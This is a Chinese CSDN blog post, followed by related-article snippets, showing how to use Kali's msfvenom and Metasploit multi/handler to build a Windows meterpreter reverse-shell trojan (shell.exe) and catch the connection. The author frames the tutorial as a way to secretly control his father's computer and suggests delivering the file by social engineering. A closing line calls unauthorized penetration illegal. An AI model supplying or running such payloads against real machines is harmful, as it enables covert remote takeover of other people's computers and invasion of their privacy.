Kali MSF攻击Win10

最新推荐文章于 2024-02-27 09:22:38 发布
最新推荐文章于 2024-02-27 09:22:38 发布
阅读量888 收藏 9
点赞数 7
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nlj1860453/article/details/135399869
版权

本来周末想出去玩,但雾霾太严重,想着偷看我爸在看什么

所以,我决定---用kali控制他的电脑!

0x00

首先下载kali,官网在Kali下载官网

如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。

0x01

在虚拟机中运行kali后打开终端(Windows的cmd),输入“ipconfig”查看IP地址。在kali终端中输入“ifconfig”查看IP地址。

我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。

0x02

接下来可以开始了!

在kali终端输入以下代码,即可生成木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP LPORT=端口 -f exe > shell.exe

我是:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.* LPORT=445 -f exe > shell.exe

运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!

0x03

在kali终端输入“msfconsole”打开MSF,分别输入以下代码:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost kali的IP
set lport 刚才木马的端口
show options
run

如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!

总结

世界上没有绝对安全的系统,防范方法:谨慎现在文件,火绒报道不要忽略

MSF还可以利用漏洞,详情看MSF17-010漏洞利用​​​​​​

最后提醒大家:

所有未经授权的渗透,都是违法的!

Hacker_NULL
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
kali 渗透msf
11-14
kali渗透测试利器
Kali Linux渗透测试--windows 10入侵和提权过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploit对windows 10入侵测试 环境
永恒之黑渗透win10
yy1024iy的博客
05-30 1937
这篇文章介绍了一种名为永恒之黑的高级网络攻击工具,它利用微软Windows系统漏洞实现远程控制、篡改和窃取数据。文章详细描述了在攻击Win10计算机中使用永恒之黑的操作步骤。与常规渗透攻击相比,永恒之黑更加难以防御,这也让用户在保护自己计算机安全时需要更重视网络安全并定期更新系统和软件。
Kali利用msf渗透Windows电脑(超详细)
最新发布
jennycisp的博客
02-27 1679
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
【问】无法安装Management Studio Express
10-26 267
【问题描述】 安装SQL2008时无法安装SQL Server 2008 Management Studio Express 【答】 先使用sql server2008安装中心(在开始菜单的microsoft sql server 2008里面有)的维护功能,将express升级到具有高级服务的Express。再安装SQL Server 2008 Management Studio Express,这就可以发现工具这个选项。安装成功。 ...
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
Kali msf教程
08-24
kali linux msf系列教程
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4031
一次MSF模拟渗透测试攻击window实例
Kali Linux-Metasploit入侵Windows10系统
冷色调的夏天的博客
08-01 3万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4483
win10系统攻击msf
kali linux msf系列视频教程
10-25
kali linux msf系列教程 -------------------------------------------- kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器...
ensp加kali实现arp欺骗攻击
04-21
使用arpspoof实现流量窃取与断网攻击
win10子系统bash安装及导入kali工具
11-24
实现windows10 bash上完成kali工具的使用,方便快捷,不需要虚拟机。 Kali系统工具很强大
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2252
windows payload 反弹shell
vmware条件下使用kali linux虚拟机对windows10进行渗透攻击的记录(学习使用)
wcf2020的博客
11-14 8121
使用kali linux虚拟机对windows10进行渗透攻击的记录 一、安装vmware tools以保证在虚拟机上创建的文件与主机可相互移动: VMware Tools是VMware虚拟机中自带的一种增强工具,是VMware提供的增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。只有在VMware虚拟机中安装好了VMware Tools,才能实现主机与虚拟机之间的文件共享,同时可支持自由拖拽的功能,鼠标也可在虚拟机与主机之间自由移动(不用再按ctrl+alt),且虚拟机屏幕也可实现...
利用kali对Windows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 1675
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括Windows、Linux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3576
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
kali使用msf攻击win xp错误
05-18
很遗憾,您提供的信息太少了,我无法确定您遇到了什么错误。但是,通常在使用Metasploit Framework(MSF攻击Windows XP时可能会出现各种错误。这可能涉及到网络连接问题、操作系统配置问题、MSF模块问题或其他问题。以下是您可能要考虑的一些常见问题和解决方法: 1. 确保Windows XP系统已经被漏洞利用程序所支持,并且系统已经被正确地配置,以便接受连接。 2. 确保你的Kali机器和Windows XP系统在同一网络中,并且能够相互通信。 3. 确保你的MSF版本是最新的,并且所有需要的模块都已经安装。 4. 确保你的payload是正确的,并且已经正确地配置。 5. 如果你遇到了错误,请先试着查看MSF的日志文件,以便确定错误的原因。 希望这些信息对您有所帮助。如果您需要更多的帮助,请提供更多的详细信息,我会尽力回答您的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值